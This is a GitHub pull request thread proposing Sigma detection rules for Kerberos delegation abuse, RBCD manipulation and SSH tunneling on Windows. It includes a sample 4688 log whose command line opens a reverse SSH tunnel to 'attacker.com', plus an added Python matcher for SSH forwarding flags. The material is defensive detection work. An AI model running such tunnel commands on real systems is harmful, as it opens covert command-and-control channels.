
Conversation

@louiselalanne

Summary of the Pull Request

This PR adds three new detection rules for common attack techniques:

  1. Kerberos Delegation abuse detection via ticket options analysis
  2. Resource-Based Constrained Delegation (RBCD) manipulation detection
  3. SSH Tunneling detection for command and control activities

These rules help detect privilege escalation, persistence, and C2 communication attempts commonly used in post-exploitation scenarios.

Changelog

new: Suspicious Kerberos Ticket Request - S4U2Proxy
new: Kerberos Constrained Delegation
new: SSH Tunneling via SSH Client on Windows

Example Log Event

Fixed Issues

SigmaHQ Rule Creation Conventions

  • If your PR adds new rules, please consider following and applying these conventions

This rule detects changes to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute in Active Directory, which may indicate potentially malicious RBCD configuration.
Updated references for SSH tunneling detection.
Updated the date for the win_security_kerberos_constrained_delegation rule.
@github-actions github-actions bot added Rules Windows Pull request add/update windows related rules labels Nov 8, 2025
Contributor

@github-actions github-actions bot left a comment

Welcome @louiselalanne 👋

It looks like this is your first pull request on the Sigma rules repository!

Please make sure to read the SigmaHQ conventions document to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.

Thanks again, and welcome to the Sigma community! 😃

@nasbench
Member

Hey @louiselalanne, can you please provide an example event log for the plink / ssh execution as well as one for the susp ticket?

@nasbench nasbench added Author Input Required changes the require information from original author of the rules Additional Data Needed labels Nov 12, 2025
@louiselalanne
Author

Hi @nasbench, the log for suspicious Kerberos:
RBCD_10
and this is the log for SSH tunneling:
Nov 1 16:44:04 lab.ad.local MSWinEventLog 1 Security 886051789 Wed Nov 12 16:44:04 2025 4688 Microsoft-Windows-Security-Auditing N/A N/A Success Audit lab.ad.local N/A A new process has been created. Creator Subject: Security ID: S-1-5-21-1426336784-303251576-769581337-11846 Account Name: lois.lane Account Domain: AD Logon ID: 0x1D0454E6 Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Process Information: New Process ID: 0x654 New Process Name: C:\OpenSSH-Win64\ssh.exe Token Elevation Type: %%1937 Mandatory Label: S-1-16-12288 Creator Process ID: 0xc5c Creator Process Name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Command Line: "C:\OpenSSH-Win64\ssh.exe" -R 8888 user@attacker.com Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy. Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account. Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group. Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator. 10171094
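The 4688 event pasted above is flattened into a single text line, which is a common shape for forwarded Windows Security logs. As an added example that is not part of this pull request or of the SigmaHQ repository, the following Python script parses that line back into fields and applies the kind of match the "SSH Tunneling via SSH Client on Windows" rule name implies: the new process is an SSH client and its command line carries a port-forwarding option. The field names, the inclusion of plink.exe (mentioned in the review above), the flag list (-R, -L, -D) and the benign contrast line are assumptions made for this example; the account, host and SID values are copied from the sample in this thread and are illustrative only.

```python
import re
from typing import Dict, List

# Constructed sample lines. The first reproduces the flattened 4688 event from
# this thread (the trailing Token Elevation Type explanation is trimmed); the
# second is a benign ssh invocation built for contrast. Host and account values
# are illustrative, not real indicators.
TUNNEL_EVENT = (
    "Nov 1 16:44:04 lab.ad.local MSWinEventLog 1 Security 886051789 "
    "Wed Nov 12 16:44:04 2025 4688 Microsoft-Windows-Security-Auditing N/A N/A "
    "Success Audit lab.ad.local N/A A new process has been created. "
    "Creator Subject: Security ID: S-1-5-21-1426336784-303251576-769581337-11846 "
    "Account Name: lois.lane Account Domain: AD Logon ID: 0x1D0454E6 "
    "Target Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 "
    "Process Information: New Process ID: 0x654 "
    "New Process Name: C:\\OpenSSH-Win64\\ssh.exe "
    "Token Elevation Type: %%1937 Mandatory Label: S-1-16-12288 Creator Process ID: 0xc5c "
    "Creator Process Name: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    'Process Command Line: "C:\\OpenSSH-Win64\\ssh.exe" -R 8888 user@attacker.com '
    "Token Elevation Type indicates the type of token that was assigned to the new process."
)

BENIGN_EVENT = TUNNEL_EVENT.replace(
    '"C:\\OpenSSH-Win64\\ssh.exe" -R 8888 user@attacker.com',
    '"C:\\OpenSSH-Win64\\ssh.exe" admin@jumphost.ad.local',
)

# Process-related labels in the order Windows renders them in a 4688 message;
# the parser cuts out the text between one label and the next.
FIELDS = [
    "New Process ID", "New Process Name", "Token Elevation Type", "Mandatory Label",
    "Creator Process ID", "Creator Process Name", "Process Command Line",
]

# Images treated as SSH clients (assumption: ssh.exe and PuTTY's plink.exe).
SSH_CLIENTS = ("\\ssh.exe", "\\plink.exe")

# -R (remote), -L (local) and -D (dynamic/SOCKS) forwarding, either as a
# separate token ("-R 8888") or fused with its argument ("-R8888").
# Combined short options such as "-NR" are deliberately not handled here.
TUNNEL_FLAG = re.compile(r"(?:^|\s)-([RLD])(?=\s|\d)")


def parse_4688(line: str) -> Dict[str, str]:
    """Extract the event id and process fields from a flattened Security 4688 event."""
    event: Dict[str, str] = {}
    m = re.search(r"\b(\d{4}) Microsoft-Windows-Security-Auditing\b", line)
    event["EventID"] = m.group(1) if m else ""
    for i, name in enumerate(FIELDS):
        if i + 1 < len(FIELDS):
            stop = re.escape(FIELDS[i + 1] + ":")
        else:
            # The command line is followed by explanatory boilerplate, not a label.
            stop = r"Token Elevation Type indicates"
        m = re.search(re.escape(name) + r": (.*?)(?: " + stop + r"|$)", line)
        if m:
            event[name.replace(" ", "")] = m.group(1)
    return event


def tunnel_flags(cmdline: str) -> List[str]:
    """Return the port-forwarding flags present in an ssh/plink command line."""
    return TUNNEL_FLAG.findall(cmdline)


def is_ssh_tunnel(event: Dict[str, str]) -> bool:
    """Match a parsed 4688 event: SSH client image plus a forwarding option."""
    if event.get("EventID") != "4688":
        return False
    image = event.get("NewProcessName", "").lower()
    if not image.endswith(SSH_CLIENTS):
        return False
    return bool(tunnel_flags(event.get("ProcessCommandLine", "")))


if __name__ == "__main__":
    for line in (TUNNEL_EVENT, BENIGN_EVENT):
        ev = parse_4688(line)
        verdict = "TUNNEL" if is_ssh_tunnel(ev) else "ok"
        print(f"{verdict:6} {ev.get('ProcessCommandLine')}")
```

The match is anchored on the image name rather than on the command line alone, so a renamed binary is not caught; pairing this with the creator process (here powershell.exe) and with outbound connections from the same process id is the usual way to raise confidence before alerting.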

@louiselalanne
Author

thanks for your time (:

Removed selection_flags condition for SSH tunneling.